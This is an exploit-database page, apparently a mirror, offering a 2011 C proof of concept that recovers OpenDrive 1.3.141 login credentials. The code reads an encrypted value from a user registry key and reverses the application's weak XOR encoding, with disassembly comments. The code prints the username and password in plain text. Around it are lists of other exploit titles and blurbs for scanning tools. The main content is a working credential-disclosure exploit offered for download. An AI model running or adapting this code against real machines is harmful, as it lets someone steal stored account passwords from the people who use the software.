Menu

Search for hundreds of thousands of exploits

"OpenDrive 1.3.141 - Local Password Disclosure"

Author

Exploit author

"Glafkos Charalambous"

Platform

Exploit platform

windows

Release date

Exploit published date

2011-06-04

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
/*

Title: OpenDrive <= 1.3.141 Local Password Disclosure
Author(s): Glafkos Charalambous, George Nicolaou
Contact: glafkos[at]astalavista[dot]com, ishtus[at]astalavista[dot]com
Version: 1.3.141
Vendor: http://www.opendrive.com
Description: Authentication credentials used by the OpenDrive application are 
prone to local disclosure attacks due to a weak cryptographic algorithm implementation

Encrypted Values:
[HKEY_CURRENT_USER\CLSID\{6E830710-B00F-4bec-9BD7-F95C1F837D02}]
"Data1"=hex:6b,c3,24,c3,69,c3,6f,c3,00,00,04,c3,52,c3,01,c3,53,c3,00,c3,56,c3,0b,c3,54,c3,00,00

Decrypted Values:
Username: 0x41
Password: d3c0d3m3

*/

#include <stdio.h>
#include <wchar.h>
#include <windows.h>

int ReadRegistryKey( LPBYTE lpBuffer, LPDWORD lpBufferSize, HKEY hKey, 
					LPCTSTR lpszSubKey, LPCTSTR lpszValueName )
{
	HKEY hKeyLocal;
	int nType;
	if( RegOpenKeyEx(hKey, lpszSubKey, 0, KEY_READ, &hKeyLocal ) 
		== ERROR_SUCCESS ) {
		if( RegQueryValueEx( hKeyLocal, lpszValueName, 0, (LPDWORD)&nType,
			lpBuffer, lpBufferSize ) == ERROR_SUCCESS ) {
			return nType;
		}
		return -1;
	}
	return -1;
}

int GetRegistryValueSize( HKEY hKey, LPCTSTR lpszSubKey, LPCTSTR lpszValueName )
{
	HKEY hKeyLocal;
	unsigned long nSize;
	if( RegOpenKeyEx(hKey, lpszSubKey, 0, KEY_READ, &hKeyLocal ) == ERROR_SUCCESS ) {
		if( RegQueryValueEx( hKeyLocal, lpszValueName, 0, NULL, NULL, (LPDWORD)&nSize ) == ERROR_SUCCESS) {
			return (int)nSize;
		}
		return -1;
	}
	return -1;
}

void DecryptOpenDrive( unsigned short *ciphertxt, int len )
{
	short username[100] = {0};
	short password[100] = {0};
	
	int count = 0; // ECX
	int wchr = 0; // ESI
	int pos = 0; // EAX
	int round = 0; // EDX
	unsigned short tmp;
	short *output;
	output = (short *)&username;
	do {
		//00401626  |>  83F9 02       /CMP ECX,2
		//00401629  |.  7D 38         |JGE SHORT OpenDriv.00401663
		//0040162B  |.  0FB73453      |MOVZX ESI,WORD PTR DS:[EBX+EDX*2]
		//0040162F  |.  66:85F6       |TEST SI,SI
		//00401632  |.  75 0F         |JNZ SHORT OpenDriv.00401643
		if ( ( wchr = ciphertxt[round] ) ) {
			//00401643  |>  8D9A 5BC3FFFF |LEA EBX,DWORD PTR DS:[EDX-3CA5] // 0, 1
			tmp = round - 0x3CA5;
			//00401649  |.  33DE          |XOR EBX,ESI // ESI = ciph[0], ciph[1]
			tmp = tmp ^ (unsigned int)wchr;
			//0040164B  |.  8B748C 20     |MOV ESI,DWORD PTR SS:[ESP+ECX*4+20] 
			//0040164F  |.  66:891C46     |MOV WORD PTR DS:[ESI+EAX*2],BX // out[0] = BX
			*output++ = tmp;
			//00401653  |.  40            |INC EAX // 0 -> 1
		}
		else {
			count++;
			if(count >= 2) break;
			//00401634  |.  8B748C 20     |MOV ESI,DWORD PTR SS:[ESP+ECX*4+20]
			//00401638  |.  33DB          |XOR EBX,EBX
			//0040163A  |.  66:891C46     |MOV WORD PTR DS:[ESI+EAX*2],BX
			*output = 0;
			output = (short *)&password;
			//0040163E  |.  41            |INC ECX
			//0040163F  |.  33C0          |XOR EAX,EAX
		}
		round++;
	} 
	while(1); 
	wprintf(L"Username: %ls\nPassword: %ls\n",username, password);
}

int main() {
	int nRegistryKeySize;
	LPBYTE buffer;
	if ( (nRegistryKeySize = GetRegistryValueSize( HKEY_CURRENT_USER, TEXT("CLSID\\{6E830710-B00F-4bec-9BD7-F95C1F837D02}"), TEXT("Data1") ) ) != -1 ) {
		buffer = (LPBYTE)calloc( nRegistryKeySize, sizeof(char) );
		if( ReadRegistryKey(buffer, (LPDWORD)&nRegistryKeySize, HKEY_CURRENT_USER, TEXT("CLSID\\{6E830710-B00F-4bec-9BD7-F95C1F837D02}"), TEXT("Data1") ) != -1 ) {
			DecryptOpenDrive( (unsigned short *)buffer, nRegistryKeySize );
		}
		else {
		wprintf(L"Error reading registry key\n");
		}
	}
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-12-27 "DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)" webapps aspx "Glafkos Charalambous"
2015-09-08 "Cisco Sourcefire User Agent 2.2 - Insecure File Permissions" local windows "Glafkos Charalambous"
2015-03-14 "Intel Network Adapter Diagnostic Driver - IOCTL Handling" dos windows "Glafkos Charalambous"
2015-01-22 "Cisco Ironport Appliances - Privilege Escalation" remote hardware "Glafkos Charalambous"
2014-10-22 "DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload (Metasploit)" webapps windows "Glafkos Charalambous"
2014-10-22 "iBackup 10.0.0.32 - Local Privilege Escalation" local windows "Glafkos Charalambous"
2013-06-24 "Alienvault Open Source SIEM (OSSIM) 4.1 - Multiple SQL Injection Vulnerabilities" webapps php "Glafkos Charalambous"
2012-09-20 "Thomson Wireless VoIP Cable Modem - Authentication Bypass" webapps hardware "Glafkos Charalambous"
2011-06-04 "OpenDrive 1.3.141 - Local Password Disclosure" local windows "Glafkos Charalambous"
2011-06-04 "Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)" remote windows "Glafkos Charalambous"
2010-08-25 "Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-25 "Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-24 "Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking" local windows "Glafkos Charalambous"
2010-08-17 "Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow" local windows "Glafkos Charalambous"
2010-08-16 "MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)" local windows "Glafkos Charalambous"
2010-08-11 "EasyFTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflows" remote windows "Glafkos Charalambous"
2009-01-11 "DZcms 3.1 - SQL Injection" webapps php "Glafkos Charalambous"
2008-11-24 "WebStudio CMS - Blind SQL Injection" webapps php "Glafkos Charalambous"
2007-06-07 "WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Glafkos Charalambous"
2007-06-04 "WebStudio CMS - 'index.php' Cross-Site Scripting" webapps php "Glafkos Charalambous"
2007-06-01 "Evenzia Content Management Systems (CMS) - Cross-Site Scripting" webapps php "Glafkos Charalambous" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected